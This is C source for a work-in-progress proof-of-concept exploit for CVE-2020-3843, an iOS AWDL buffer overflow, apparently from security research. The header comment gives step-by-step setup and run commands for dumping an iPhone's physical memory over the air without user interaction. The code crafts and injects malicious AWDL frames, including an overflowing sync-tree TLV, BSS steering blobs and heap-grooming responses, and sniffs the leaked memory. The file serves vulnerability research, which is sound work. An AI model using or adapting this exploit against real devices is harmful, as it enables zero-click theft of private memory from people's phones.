// @i41nbeer

// portions of this project are adapted from the OWL opensource project:
// https://github.com/seemoo-lab/owl
// these portions are used under the following license:

/*
 * OWL: an open Apple Wireless Direct Link (AWDL) implementation
 * Copyright (C) 2018  The Open Wireless Link Project (https://owlink.org)
 * Copyright (C) 2018  Milan Stute
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org/licenses/>.
 */

// many thanks to the OWL team for their work!

/*
This is a work-in-progress exploit for CVE-2020-3843, a buffer overflow in AWDL.
This is P0 issue 1982 https://bugs.chromium.org/p/project-zero/issues/detail?id=1982

Currently this poc demonstrates the ability to remotely dump device physical memory regions
over the air with no user interaction on iPhone 11 Pro running iOS 13.3.

This poc expects to run on linux with libpcap, with two wifi adaptors capable of
packet injection. I am using "NetGear, Inc. WG111v2 54 Mbps Wireless [RealTek RTL8187L]"

Importantly, the adaptor driver/firmware must respect the IEEE80211_RADIOTAP_F_TX_NOACK radiotap
header flag. I'm using this to hack around having to actually implement AWDL timing properly ;)

Put your two adaptors in to monitor mode and set them to channel 6, you can do that like this:

######################
# create monitor mode interface:
iw phy phy0 interface add mon0 type monitor

# or use airmon-ng
airmon-ng start wlan0 6

# set the channel to 6 (2.4 GHz AWDL social channel)
iwconfig mon0 channel 6

# something isn't quite right in the setup yet
# a workaround is to first run airodump-ng:
airodump-ng -i mon0 -c 6

# you should see some AWDL traffic there
####################

The physical memory dumping is abusing the fact that on iOS the physmap region, which provides direct virtual mappings
of large parts of device physical memory is larger than the random ASLR shift which is applied to it. It's almost 4GB in size,
but its virtual address only varies by around 1GB, leading to kernel virtual addresses which are always mapped
and which provide a window in to device physical memory.

The poc kicks of the BSS Steering state machine which causes the allocation of a "BSS Steering blob" which will
be sent over-the-air. We can corrupt this blob pointer using CVE-2020-3843, pointing it to an arbitrary address.

The only pre-requisite for getting this memory sent over-the-air is that the second dword which is pointed to
will be treated as the length, and must pass a bounds check ensuring it fits in the to-be-sent frame. If the value
is too large, the bounds check fails and the frame won't be sent, but nothing breaks. If the value is sufficiently
small, the memory will be sent in a Uniform Master Indication AWDL frame.

This is currently only a minimal poc to demonstrate that this does really work. It's suggested that you attempt to
first fill physical memory with a target pattern, for example by reloading this page a few times in safari:

https://jsfiddle.net/h85t3ayL/ 

this will fill a bunch of physical memory with the dword 0x00000041.

The only pre-requisite for the BSS Steering technique is that the target device must be connected to a 5Ghz wifi network on 
a non-DFS channel. You as an attacker do not need to be on that network. This is not such an extreme pre-requisite as DFS
is an optional feature which can be disabled at runtime. For testing I am using an airport extreme to create a network
on channel 36.

Running:
This poc does not attempt to force the AWDL interface to activate (eg via BLE beacons.) See other published research
for ideas there. It's also important to note that on iOS the AWDL interface will have a new, random MAC address each time
it's activated.

To force AWDL to activate you can open the photos app and open the sharing panel. Even with "receiving off" in Airdrop
settings this will be enough to activate the AWDL interface. At this point, run:

airodrop-ng mon0 -c 6

where mon0 is the name of one of the monitor mode interfaces. You should see a STATION connected to the
AWDL BSSID of 00:25:00:FF:94:73. Take note of the STATION MAC, this is the iPhone AWDL interface mac address.

In one terminal run:
./awdl_exploit mon0 UMI <TARGET_MAC>

and in another run:
./awdl_exploit mon1 <TARGET_MAC>

Where mon0 and mon1 are the two, distinct wifi adaptors

The first invocation will monitor all received packets looking for those which contain physical memory sent back from the device.

The second will run the exploit. You can open the airdrop pane in the sharing panel to ensure AWDL stays active.

You should see some physical memory being dumped. If you ran the jsfiddle heapspray you might see output like this:

************************** got BSS steering blob: ******************************
1d 49 00 41 00 00 00 41 00 00 00 41 00 00 00 41 
00 00 00 41 00 00 00 41 00 00 00 41 00 00 00 41 
00 00 00 41 00 00 00 41 00 00 00 41 00 00 00 41 
00 00 00 41 00 00 00 41 00 00 00 41 00 00 00 41 
00 00 00 41 00 00 00 41 00 00 00 41 

Current limitations:

Speed: This poc makes no attempt to become the master node, and only uses channel 6 (on 2.4Ghz)
       This means there are only a few miliseconds per second when the target will receive our packets.
       This makes it extremely slow!

no RCE??: that's part II ;-)
*/

#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/time.h>

#include <net/if.h>
#include <netinet/ether.h>

#include <linux/wireless.h>

#include <pcap/pcap.h>

void fail(const char* msg, ...) {
    va_list args;
    va_start(args, msg);
    printf("FAIL: ");
    vprintf(msg, args);
    printf("\n");
    exit(EXIT_FAILURE);
}

void log_msg(const char* msg, ...) {
    va_list args;
    va_start(args, msg);
    printf("LOG: ");
    vprintf(msg, args);
    printf("\n");
}


pcap_t* setup_wlan_device_faster(const char* if_name) {
    unsigned int if_index = if_nametoindex(if_name);
    if (if_index == 0) {
        fail("unable to resolve the network inteface %s to a valid interface number, check the interface name", if_name);
    }
    log_msg("resolved interface %s to index %d", if_name, if_index);

    // open the device
    char errbuf[PCAP_ERRBUF_SIZE] = {0};
    pcap_t* pcap_handle = pcap_create(if_name, errbuf);
    if (pcap_handle == NULL) {
        fail("unable to pcap_create handle for interface %s. pcap error message: %s", if_name, errbuf);
    }
    log_msg("created pcap device handle");

    int pcap_err;
    pcap_err = pcap_set_snaplen(pcap_handle, 0xffff);
    if (pcap_err != 0) {
        fail("pcap_set_snaplen failed");
    }

    pcap_err = pcap_set_promisc(pcap_handle, 1);
    if (pcap_err != 0) {
        fail("pcap_set_promisc failed");
    }

    pcap_err = pcap_set_rfmon(pcap_handle, 1);
    if (pcap_err != 0) {
        fail("pcap_set_rfmon failed");
    }

    // set immediate mode instead of a timeout:
    pcap_set_immediate_mode(pcap_handle, 1);

    
    pcap_err = pcap_set_timeout(pcap_handle, 1);
    if (pcap_err != 0) {
        fail("pcap_set_timeout failed");
    }
    
    // activate the handle
    pcap_err = pcap_activate(pcap_handle);
    if (pcap_err != 0) {
        fail("pcap_activate failed");
    }


    // check that we're going to get radiotap headers
    int datalink_type = pcap_datalink(pcap_handle);
    if (datalink_type != DLT_IEEE802_11_RADIO) {
        fail("this handle isn't going to give us radiotap headers");
    }

    return pcap_handle;
}

struct ieee80211_radiotap_header_compat {
    uint8_t version;
    uint8_t pad;
    uint16_t len;
    uint32_t present;
} __attribute__((packed));

struct ieee80211_hdr {
    uint16_t frame_control;
    uint16_t duration_id;
    struct ether_addr dst_addr;
    struct ether_addr src_addr;
    struct ether_addr bssid_addr;
    uint16_t seq_ctrl;
} __attribute__((packed));

struct ieee80211_ack {
    uint16_t frame_control;
    uint16_t duration_id;
    struct ether_addr dst_addr;
} __attribute__((packed));

struct oui {
    uint8_t bytes[3];
} __attribute__((packed));

struct awdl_action {
    uint8_t category;
    struct oui oui;
    uint8_t type;
    uint8_t version;
    uint8_t subtype;
    uint8_t reserved;
    uint32_t phy_tx;
    uint32_t target_tx;
} __attribute__((packed));

const struct oui awdl_oui = {0x00, 0x17, 0xf2};

struct awdl_sync_params_tlv {
    uint8_t type;
    uint16_t length; // +0x01
    uint8_t next_aw_channel; // +0x03
    uint16_t tx_down_counter; // +0x04
    uint8_t master_channel; // +0x06
    uint8_t guard_time; // +0x07
    uint16_t aw_period; // +0x08 /* AW period in TUs */
    uint16_t af_period; // +0x0a /* how often action frames are sent out in TUs */
    uint16_t flags; // +0x0c
    uint16_t aw_ext_length; // +0x0e /* length of an extended AW in TUs */
    uint16_t aw_com_length; // +0x10/* length of a regular AW in TUs */
    uint16_t remaining_aw_length; // +0x12
    uint8_t min_ext; // +0x14
    uint8_t max_ext_multicast; // +0x15
    uint8_t max_ext_unicast; // +0x16
    uint8_t max_ext_af; // +0x17
    struct ether_addr master_addr; // +0x18
    uint8_t presence_mode;// +0x1e
    uint8_t reserved; // +0x1f
    uint16_t next_aw_seq; // +0x20
    uint16_t ap_alignment; // 0x22              // +0x1f
    
    // CHANSEQ
    uint8_t count; // +0x24                      // +0x21
    uint8_t encoding; // +0x25                   // +0x22
    uint8_t duplicate_count; // +0x26            // +0x23
    uint8_t step_count; // +0x27                 // +0x24
    uint16_t fill_channel; //+0x28               // +0x25

    uint16_t seq[16]; //+0x2a
    // +0x4a

      // +0x24 must be a length (chanseq len? and must be less than 0x1f
/* struct awdl_chanseq chanseq; */
    /* uint8_t pad[2]; */
} __attribute__((__packed__));

struct service_response_tlv {
    uint8_t type;
    uint16_t len;
    uint16_t s_1;
    uint8_t key_buf[2];
    uint16_t v_1;
    uint16_t v_2;
    uint16_t val_buf[2];
} __attribute__((packed));


struct data_path_tlv {
    uint8_t type;
    uint16_t len;
    uint16_t flags;
    char country_code[3];
    uint16_t social_channels;
    struct ether_addr awdl_addr;
    uint16_t ext_flags;
} __attribute__((packed));

struct unicast_data_path_tlv {
    uint8_t type;
    uint16_t length;
    uint16_t flags;
    uint8_t country_code[3];
    uint16_t social_channel_map;
    uint8_t infra_bssid[6];
    uint16_t infra_channel;
    uint8_t infra_addr[6];
    uint8_t awdl_addr[6];
    uint32_t unicast_options;
} __attribute__((packed));

struct service_params_tlv {
    uint8_t type;
    uint16_t len;
    uint8_t unk[3];
    uint16_t sui;
    uint32_t bitmask;
} __attribute__((packed));


struct ht_caps_tlv {
    uint8_t type;
    uint16_t length;
    uint16_t unk;
    uint16_t ht_capabilities;
    uint8_t ampdu_capabilities;
    uint8_t rx_mcs;
    uint16_t unk_2;
} __attribute__((packed));

struct chan_seq_tlv {
    uint8_t type;
    uint16_t length;
    uint8_t count;
    uint8_t encoding;
    uint8_t duplicate_count;
    uint8_t step_count;
    uint16_t fill_channel;
    uint8_t seq[64];
} __attribute__((packed));



// TLV for the buffer overflow
struct sync_tree_tlv {
    uint8_t type;
    uint16_t length;
    uint8_t buf[0];
} __attribute__((packed));

// TLV for triggering the allocation of bsssteering blobs
struct bss_steering_tlv {
    uint8_t type;
    uint16_t length;
    uint32_t steeringMsgID;
    uint32_t steeringMsgLen;
    uint32_t peer_count;
    struct ether_addr peer_macs[8];
    struct ether_addr BSSID;
    uint32_t steeringTimeoutThreshold;
    uint32_t SSID_len;
    uint8_t infra_channel;
    uint32_t steeringCmdFlags;
    char SSID[32];
} __attribute__((packed));

pcap_t* global_pcap_handle = NULL;

void hexdump(uint8_t* bytes, uint32_t size) {
    int col = 0;
    for(; size > 0; size--) {
        printf("%02x ", *bytes++);
        col += 1;
        col %= 16;
        if (col == 0) {
            printf("\n");
        }
    }
    printf("\n");
}

void parse_bss_steering_tlv(uint8_t* ptr) {
    printf(" ************************** got BSS steering blob: ******************************\n");
    hexdump(ptr, *(uint16_t*)(ptr+1)+3);
}

void parse_tlvs_for_umi(uint8_t* buf, uint32_t remaining) {
    //hexdump(buf, remaining);
    for (;;) {
        if (remaining == 0) {
            return;
        }

        uint8_t* tlv = buf;

        uint8_t type = *buf++;
        remaining -= 1;

        if (remaining < 2) {
            //log_msg("invalid TLV, ignoring (no space for length)");
            return;
        }

        uint16_t len = *(uint16_t*)buf;
        buf += 2;
        remaining -= 2;
        
        if (remaining < len) {
            //log_msg("invalid TLV, ignoring (length is 0x%04x, but remaining is only 0x%x)", len, remaining);
            return;
        }

        //log_msg("TLV %02x %04x", type, len);
        switch(type) {
          case 0x1D:
            parse_bss_steering_tlv(tlv);
            break;
        }
        //hexdump(buf, len);
        buf += len;
        remaining -= len;
    }
}

uint8_t awdl_version(int major, int minor) {
    return ((uint8_t) (((major) << 4) & 0xf0) | ((minor) & 0x0f));
}

#define IEEE80211_VENDOR_SPECIFIC 127
#define AWDL_TYPE 8
#define AWDL_VERSION_COMPAT awdl_version(1,0)

#define AWDL_ACTION_PSF 0
#define AWDL_ACTION_MIF 3

void handle_awdl_action_frame_for_umi(struct ieee80211_hdr* hdr, uint32_t remaining) {
    struct awdl_action* action_header = (struct awdl_action*)(hdr+1);
    remaining -= sizeof(struct ieee80211_hdr);

    if (remaining < sizeof(struct awdl_action)) {
        //log_msg("not enough data for awdl_action header, ignoring");
        return;
    }

    // some more checks that this really is an AWDL action frame:
    if (action_header->category != IEEE80211_VENDOR_SPECIFIC) {
        //log_msg("bad category (0x%0x), not AWDL", action_header->category);
        return;
    }

    if (memcmp(&action_header->oui, &awdl_oui, 3) != 0) {
        //log_msg("bad oui, not AWDL");
        return;
    }

    if (action_header->type != AWDL_TYPE) {
        //log_msg("type isn't AWDL");
        return;
    }

    if (action_header->version != AWDL_VERSION_COMPAT) {
        //log_msg("type isn't AWDL_VERSION_COMPAT (1,0)");
        return;
    }

    uint8_t subtype = action_header->subtype;
    if (subtype != AWDL_ACTION_PSF && subtype != AWDL_ACTION_MIF) {
        //log_msg("subtype isn't PSF or MIF (0x%x)", subtype);
        return;
    }

    parse_tlvs_for_umi((uint8_t*)(action_header+1), remaining-sizeof(struct awdl_action));
}

#define IEEE80211_FCTL_FTYPE 0x000c
#define IEEE80211_FCTL_STYPE 0x00f0

#define IEEE80211_FTYPE_MGMT   0x0000
#define IEEE80211_STYPE_ACTION 0x00d0

const struct ether_addr awdl_bssid = {0x00, 0x25, 0x00, 0xff, 0x94, 0x73};

void umi_packet_handler(unsigned char* user,
                       const struct pcap_pkthdr *h,
                       const unsigned char *bytes) {
    struct ether_addr* target_mac = (struct ether_addr*)user;

    if (h->caplen < sizeof(struct ieee80211_radiotap_header_compat)) {
        // log_msg("captured packet not big enough for radiotap header, ignoring");
        return;
    }

    // we can get stuff like RSSI and receive time from the radiotap headers
    // for now, skip them

    uint16_t radiotap_len = ((struct ieee80211_radiotap_header_compat *)bytes)->len;
    //log_msg("radiotap len: %d\n", radiotap_len);
    bytes += radiotap_len;

    uint32_t remaining = h->caplen - radiotap_len;

    // h->caplen also include a 4 byte checksum, decrement the length by that
    // not checking the checksum yet
    if (remaining < 4) {
        log_msg("not enough space for the checksum, ignoring");
        return;
    }
    remaining -= 4;

    if (remaining < sizeof(struct ieee80211_hdr)) {
        // log_msg("captured packed not big enough for ieee80211 header, ignoring");
        return;
    }

    // now should have ieee80211 header:
    struct ieee80211_hdr* hdr = (struct ieee80211_hdr *)bytes;    

    // what type of packet is this? looking for AWDL action frames
    // this is ignoring AMSDUs, is that okay?
    if ((hdr->frame_control & (IEEE80211_FCTL_FTYPE | IEEE80211_FCTL_STYPE))
                           ==
                              (IEEE80211_FTYPE_MGMT | IEEE80211_STYPE_ACTION))
    {
        if (memcmp(&hdr->bssid_addr, &awdl_bssid, 6) == 0) {
            // bssid matches hardcoded AWDL bssid:

            // is it from the target MAC?
            if ((memcmp(&hdr->src_addr, target_mac, sizeof(struct ether_addr))) == 0) {
                handle_awdl_action_frame_for_umi(hdr, remaining);
            }
        }
    }
}

void monitor_umi(pcap_t* pcap_handle, struct ether_addr* target_mac) {
    global_pcap_handle = pcap_handle;
    int pcap_err = pcap_loop(pcap_handle, 0, umi_packet_handler, (void*)target_mac);
    
    if (pcap_err == -2) {
        // pcap_breakloop was called, indicating that we broke out of the monitor loop
        log_msg("back in monitor_umi after pcap_breakloop()");
    }
}

uint64_t clock_time_us() {
    struct timespec now = {0};

    int err = clock_gettime(CLOCK_MONOTONIC, &now);
    if (err) {
        fail("can't get current time");
    }
    uint64_t us = now.tv_sec * 1000000;
    us += now.tv_nsec / 1000;
    return us;
}


// this array is from wifi packet injection tutorial https://gist.github.com/jonhoo/7780260
static uint8_t u8aRadiotapHeader[] = {

  0x00, 0x00, // <-- radiotap version (ignore this)
  0x18, 0x00, // <-- number of bytes in our header (count the number of "0x"s)

  /**
   * The next field is a bitmap of which options we are including.
   * The full list of which field is which option is in ieee80211_radiotap.h,
   * but I've chosen to include:
   *   0x00 0x01: timestamp
   *   0x00 0x02: flags
   *   0x00 0x03: rate
   *   0x00 0x04: channel
   *   0x80 0x00: tx flags (seems silly to have this AND flags, but oh well)
   */
  0x0f, 0x80, 0x00, 0x00,

  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // <-- timestamp

  /**
   * This is the first set of flags, and we've set the bit corresponding to
   * IEEE80211_RADIOTAP_F_FCS, meaning we want the card to add a FCS at the end
   * of our buffer for us.
   */
  0x10,

  0x00, // <-- rate
  0x00, 0x00, 0x00, 0x00, // <-- channel

  /**
   * This is the second set of flags, specifically related to transmissions. The
   * bit we've set is IEEE80211_RADIOTAP_F_TX_NOACK, which means the card won't
   * wait for an ACK for this frame, and that it won't retry if it doesn't get
   * one.
   */
  0x08, 0x00,
};

typedef struct pkt_buf {
    size_t len;
    uint8_t buf[];
} pkt_buf_t;

pkt_buf_t* pkt_buf_wrap(void* buffer, size_t len) {
    size_t total_size = len + sizeof(pkt_buf_t);
    pkt_buf_t* pkt = malloc(total_size);
    pkt->len = len;
    memcpy(pkt->buf, buffer, len);
    return pkt;
}

void pkt_buf_free(pkt_buf_t* pkt) {
    free(pkt);
}

#define PKT_END() (pkt_buf_wrap(NULL, 0))

int is_ack(const struct pcap_pkthdr *h,
           const unsigned char *bytes,
           struct ether_addr* src_mac) {
    if (h->caplen < sizeof(struct ieee80211_radiotap_header_compat)) {
        // log_msg("captured packet not big enough for radiotap header, ignoring");
        return 0;
    }

    // we can get stuff like RSSI and receive time from the radiotap headers
    // for now, skip them

    uint16_t radiotap_len = ((struct ieee80211_radiotap_header_compat *)bytes)->len;
    //log_msg("radiotap len: %d\n", radiotap_len);
    bytes += radiotap_len;

    uint32_t remaining = h->caplen - radiotap_len;

    // h->caplen also include a 4 byte checksum, decrement the length by that
    // not checking the checksum yet
    if (remaining < 4) {
        log_msg("not enough space for the checksum, ignoring");
        return 0;
    }
    remaining -= 4;

    // acks are only 10 bytes
    if (remaining < sizeof(struct ieee80211_ack)) {
        // log_msg("captured packed not big enough for ieee80211 header, ignoring");
        return 0;
    }

    struct ieee80211_ack* ack = (struct ieee80211_ack *)bytes;    
    
    // TODO: use correct flags
    if ((ack->frame_control == 0x00d4) &&
        (ack->duration_id == 0) &&
        (memcmp(src_mac, &ack->dst_addr, 6) == 0)) {
        return 1;
    }

    return 0;
}

void* reassemble_packet(size_t* out_size, pkt_buf_t* first, va_list rest) {
    // we will iterate the argument list twice
    // since we are only passed the va_list we need to make a copy to do that:

    va_list copy;
    va_copy(copy, rest);

    if (first->len == 0) {
        fail("reassembling empty packet buffer");
    }

    // compute total size:
    size_t total_size = first->len;

    while (1) {
        pkt_buf_t* elem = va_arg(rest, pkt_buf_t*);
        if (elem->len == 0) {
            // this is the last element:
            break;
        }
        total_size += elem->len;
    }

    uint8_t* buffer = malloc(total_size+4);
    memset(buffer, 0, total_size);

    // copy in chunks
    size_t offset = 0;
    memcpy(buffer, first->buf, first->len);

    offset += first->len;
    pkt_buf_free(first);

    // have to use the copy the second time round:
    while (1) {
        pkt_buf_t* elem = va_arg(copy, pkt_buf_t*);
        if (elem->len == 0) {
            // this is the last element:
            break;
        }
        memcpy(&buffer[offset], elem->buf, elem->len);
        offset += elem->len;
        pkt_buf_free(elem);
    }

    if (offset != total_size) {
        fail("reassembly failed: offset != total_size");
    }
   
   *out_size = total_size;
   return buffer; 
}

// don't wait for an ACK, but do try to make sure it actually sent
int inject_unreliable(pkt_buf_t* first, ...) {
    // reassemble:
    va_list ap;
    
    va_start(ap, first);

    size_t total_size = 0;
    uint8_t* buffer = reassemble_packet(&total_size, first, ap);

    va_end(ap);

    int pcap_err;

    do {
        pcap_err = pcap_inject(global_pcap_handle, buffer, total_size+4); // TODO: deal with this +4...
        if (pcap_err == PCAP_ERROR) {
            log_msg("pcap_inject failed with PCAP_ERROR");
            pcap_perror(global_pcap_handle, "inject failed");
        }
    } while (pcap_err == PCAP_ERROR);

    log_msg("pcap_inject success (unreliable)");

    free(buffer);
}

int inject(pkt_buf_t* first, ...) {
    // reassemble:
    va_list ap;
    
    va_start(ap, first);

    size_t total_size = 0;
    uint8_t* buffer = reassemble_packet(&total_size, first, ap);

    va_end(ap);

    // extract out the src mac since we need it to determine whether the
    // ACK we see is being send to our spoofed src
    // TODO: don't use a fixed size for the RT headers..
    // TODO: fix this if we start injecting ACKs, since they're not this big...
    struct ieee80211_hdr* hdr = (struct ieee80211_hdr*)(buffer+sizeof(u8aRadiotapHeader));
    struct ether_addr src_mac = hdr->src_addr;

    // we will keep trying until we get an ACK:
    while (1) {
        // the +4 is for the checksum
        int pcap_err = pcap_inject(global_pcap_handle, buffer, total_size+4); // TODO: deal with this +4...
        if (pcap_err == PCAP_ERROR) {
            log_msg("pcap_inject failed with PCAP_ERROR");
            pcap_perror(global_pcap_handle, "inject failed");
        } else {
            log_msg("pcap_inject success (reliable)");
        }

        // how can we block here until that's definitely gone over-the-air?
        //usleep(1000); // wait half a milisecond?

        int got_ack = 0;
        // try to get an ack:
        for (int i = 0; i < 100; i++) {
            struct pcap_pkthdr* pkt_hdr = NULL;
            const uint8_t* pkt_data = NULL;
            int pkt_err = pcap_next_ex(global_pcap_handle, &pkt_hdr, &pkt_data);
            if (pkt_err == 1) {
                // "a packet was read without problems"
                got_ack = is_ack(pkt_hdr, pkt_data, &src_mac);
                if (got_ack) {
                    break;
                }
            }
            if (pkt_err == 0) {
                // "timeout expired"
            }
            if (pkt_err == -1) {
                // "error occured while reading the packet"
            }
            if (pkt_err == -2) {
                // "no more packets to read from the savefile"
            }
            usleep(1); // wait up to .1ms?
        }
        if (got_ack) {
            break;
        }
        usleep(1000);
    }
    log_msg("got ACK");

    free(buffer);
}

// takes ownership of pkt_in
static pkt_buf_t* REPEAT(pkt_buf_t* pkt_in, uint32_t n) {
    uint32_t elem_size = pkt_in->len;
    size_t total_size = sizeof(pkt_buf_t) + (n*elem_size);
    pkt_buf_t* pkt = malloc(total_size);
    pkt->len = (n*elem_size);

    for (uint32_t i = 0; i < n; i++) {
        memcpy(&pkt->buf[(i*elem_size)], pkt_in->buf, elem_size);
    }

    free(pkt_in);

    return pkt;
}

// radiotap header
static pkt_buf_t* RT() {
    return pkt_buf_wrap(u8aRadiotapHeader, sizeof(u8aRadiotapHeader));
}

// 80211 header
// two versions

static pkt_buf_t* WIFI(struct ether_addr dst_mac, struct ether_addr src_mac) {
    struct ieee80211_hdr hdr = {0};

    hdr.frame_control = IEEE80211_FTYPE_MGMT | IEEE80211_STYPE_ACTION;
    hdr.duration_id = 0;
    memcpy(&hdr.dst_addr, &dst_mac, 6);
    memcpy(&hdr.src_addr, &src_mac, 6);
    hdr.bssid_addr  = awdl_bssid;
    hdr.seq_ctrl    = 0;

    return pkt_buf_wrap(&hdr, sizeof(hdr));
}

static pkt_buf_t* AWDL() {
    struct awdl_action action = {0};

    action.category = IEEE80211_VENDOR_SPECIFIC;
    action.oui = awdl_oui;
    action.type = AWDL_TYPE;
    action.version = AWDL_VERSION_COMPAT;
    action.subtype = AWDL_ACTION_MIF;
    action.reserved = 0;
    action.phy_tx = clock_time_us();
    action.target_tx = action.phy_tx;

    return pkt_buf_wrap(&action, sizeof(action));
}


pkt_buf_t* SYNC_PARAMS() {
    struct awdl_sync_params_tlv sp = {0};

    sp.type = 4;
    sp.length = sizeof(struct awdl_sync_params_tlv) - 3;

    sp.next_aw_channel = 6;
    sp.tx_down_counter = 0x10;
    sp.master_channel = 6;
    sp.guard_time = 0;
    sp.aw_period = 0x10;
    sp.af_period = 0x6e;
    sp.flags = 0x1800;
    sp.aw_ext_length = 0x10;
    sp.aw_com_length = 0x10;
    sp.remaining_aw_length = 0;
    sp.min_ext = 3;
    sp.max_ext_multicast = 3;
    sp.max_ext_unicast = 3;
    sp.max_ext_af = 3;
    uint8_t master_mac[] = {0x44, 0x44, 0x44, 0x55, 0x55, 0x55};
    memcpy(&sp.master_addr, master_mac, 6);
    sp.presence_mode = 4;
    sp.reserved = 0;
    sp.next_aw_seq = 1234;
    sp.ap_alignment = 0;

    sp.count = 0xf;
    sp.encoding = 3;
    sp.duplicate_count = 0;
    sp.step_count = 3;
    sp.fill_channel = 0xffff;

    for (int i = 0; i < 16; i++) {
        sp.seq[i] = 0x2b06;
    }

    return pkt_buf_wrap(&sp, sizeof(sp));
}

pkt_buf_t* DATAPATH(struct ether_addr src_mac) {
    struct data_path_tlv dp = {0};

    dp.type = 0xc;
    dp.len = sizeof(struct data_path_tlv) - 3;
    dp.flags = 0x8f24;
    memcpy(&dp.awdl_addr, &src_mac, 6);
    dp.country_code[0] = 'X';
    dp.country_code[1] = '0';
    dp.country_code[2] = 0;
    dp.social_channels = 1;
    dp.ext_flags = 0;

    return pkt_buf_wrap(&dp, sizeof(dp));
}

pkt_buf_t* UNICAST_DATAPATH(uint32_t flags) {
    struct unicast_data_path_tlv dp = {0};

    dp.type = 0xc;
    dp.length = sizeof(struct unicast_data_path_tlv) - 3;
    dp.flags = flags;
    memset(dp.country_code, 'A', 3);
    dp.social_channel_map = 1;
    uint8_t infra_bssid[] = {0x22, 0x12, 0x21, 0x12, 0x21, 0x12};
    memcpy(dp.infra_bssid, infra_bssid, 6);
    dp.infra_channel = 8;

    uint8_t infra_addr[] = {0x22, 0x33, 0x11, 0x12, 0x21, 0x12};
    memcpy(dp.infra_addr, infra_addr, 6);

    uint8_t awdl_addr[] = {0x22, 0x44, 0x11, 0x12, 0x21, 0x12};
    memcpy(dp.awdl_addr, awdl_addr, 6);

    dp.unicast_options = 0x44434241;

    return pkt_buf_wrap(&dp, sizeof(dp));
}


pkt_buf_t* BSS_STEERING(struct ether_addr* peer_macs, int n_peers) {
    struct bss_steering_tlv bs = {0};

    bs.type = 0x1d;
    bs.length = sizeof(struct bss_steering_tlv) - 3;

    bs.steeringMsgID = 6;
    bs.steeringMsgLen = sizeof(struct bss_steering_tlv)-3-8; // ??
    bs.peer_count = n_peers;
    
    for (int i = 0; i < n_peers; i++) {
        bs.peer_macs[i] = peer_macs[i];
    }

    uint8_t bssid[6] = {0x22, 0x33, 0x44, 0x55, 0x66, 0x77};
    memcpy(&bs.BSSID, bssid, 6);

    bs.steeringTimeoutThreshold = 0x424242;
    char* ssid_str = "FAKENET";
    bs.SSID_len = strlen(ssid_str);

    bs.infra_channel = 0x74; // 6;
    bs.steeringCmdFlags = 0x200;
    strcpy(bs.SSID, ssid_str);

    return pkt_buf_wrap(&bs, sizeof(bs));
}

pkt_buf_t* BSS_STEERING_0(struct ether_addr* peer_macs, int n_peers) {
    struct bss_steering_tlv bs = {0};

    bs.type = 0x1d;
    bs.length = sizeof(struct bss_steering_tlv) - 3;

    bs.steeringMsgID = 0;
    bs.steeringMsgLen = sizeof(struct bss_steering_tlv)-3-8; // ??
    bs.peer_count = n_peers;
    
    for (int i = 0; i < n_peers; i++) {
        bs.peer_macs[i] = peer_macs[i];
    }

    uint8_t bssid[6] = {0x22, 0x33, 0x44, 0x55, 0x66, 0x77};
    memcpy(&bs.BSSID, bssid, 6);

    bs.steeringTimeoutThreshold = 0x424242;
    char* ssid_str = "FAKENET";
    bs.SSID_len = strlen(ssid_str);

    bs.infra_channel = 0x74; // 6;
    bs.steeringCmdFlags = 0x200;
    strcpy(bs.SSID, ssid_str);

    return pkt_buf_wrap(&bs, sizeof(bs));
}

pkt_buf_t* HT_CAPS() {
    struct ht_caps_tlv ht = {0};
    ht.type = 7;
    ht.length = sizeof(struct ht_caps_tlv) - 3;

    ht.unk = 0;
    ht.ht_capabilities = 0x11ce; // these are from OWL
    ht.ampdu_capabilities = 0x1b;
    ht.rx_mcs = 0xff;
    ht.unk_2 = 0;

    return pkt_buf_wrap(&ht, sizeof(ht));
}

pkt_buf_t* CHAN_SEQ() {
    struct chan_seq_tlv cs = {0};

    cs.type = 18;
    cs.length = sizeof(struct chan_seq_tlv) - 3;
    cs.count = 32;
    cs.encoding = 0;
    cs.duplicate_count = 0;
    cs.step_count = 3;
    cs.fill_channel = 0xffff;
    for (int i = 0; i < 32; i++) {
        cs.seq[(i*2)+0] = 6;
        cs.seq[(i*2)+1] = 0;
    }

    return pkt_buf_wrap(&cs, sizeof(cs));
}

pkt_buf_t* SYNC_TREE(struct ether_addr* macs, uint32_t n_macs) {
    size_t total_size = 3+(n_macs*6);
    struct sync_tree_tlv* st = malloc(total_size); 

    st->type = 0x14;
    st->length = n_macs*6;

    memcpy(st->buf, macs, n_macs*6);

    pkt_buf_t* pb = pkt_buf_wrap(st, total_size);
    free(st);
    return pb;
}

struct service_response_leaker_tlv {
    uint8_t type;
    uint16_t len;
    uint16_t s_1;
    uint8_t key_buf[2];
    uint16_t v_1;
    uint16_t v_2;
    uint32_t val_buf[2];
} __attribute__((packed));

pkt_buf_t* SERV_RESP() {
    struct service_response_leaker_tlv sr = {0};

    sr.type = 2;
    sr.len = sizeof(struct service_response_leaker_tlv) - 3;
    sr.s_1 = 2;
    sr.key_buf[0] = 'A';
    sr.key_buf[1] = 'B';
    sr.v_1 = 95; // kalloc.96
    sr.v_2 = 0x0; // offset
    sr.val_buf[0] = 6; // msg_id
    sr.val_buf[1] = 0x320; // length

    return pkt_buf_wrap(&sr, sizeof(sr));
}

struct service_response_groom_tlv {
    uint8_t type;
    uint16_t len;
    uint16_t s_1;
    uint8_t key_buf[2];
    uint16_t v_1;
    uint16_t v_2;
    uint8_t val_buf[2];
} __attribute__((packed));

pkt_buf_t* SERV_RESP_GROOM(uint16_t kalloc_size) {
    struct service_response_groom_tlv sr = {0};

    sr.type = 2;
    sr.len = sizeof(struct service_response_groom_tlv) - 3;
    sr.s_1 = 2;
    sr.key_buf[0] = 'A';
    sr.key_buf[1] = 'B';
    sr.v_1 = kalloc_size;
    sr.v_2 = 0x0; // offset
    sr.val_buf[0] = 0x42;
    sr.val_buf[1] = 0x42;

    return pkt_buf_wrap(&sr, sizeof(sr));
}

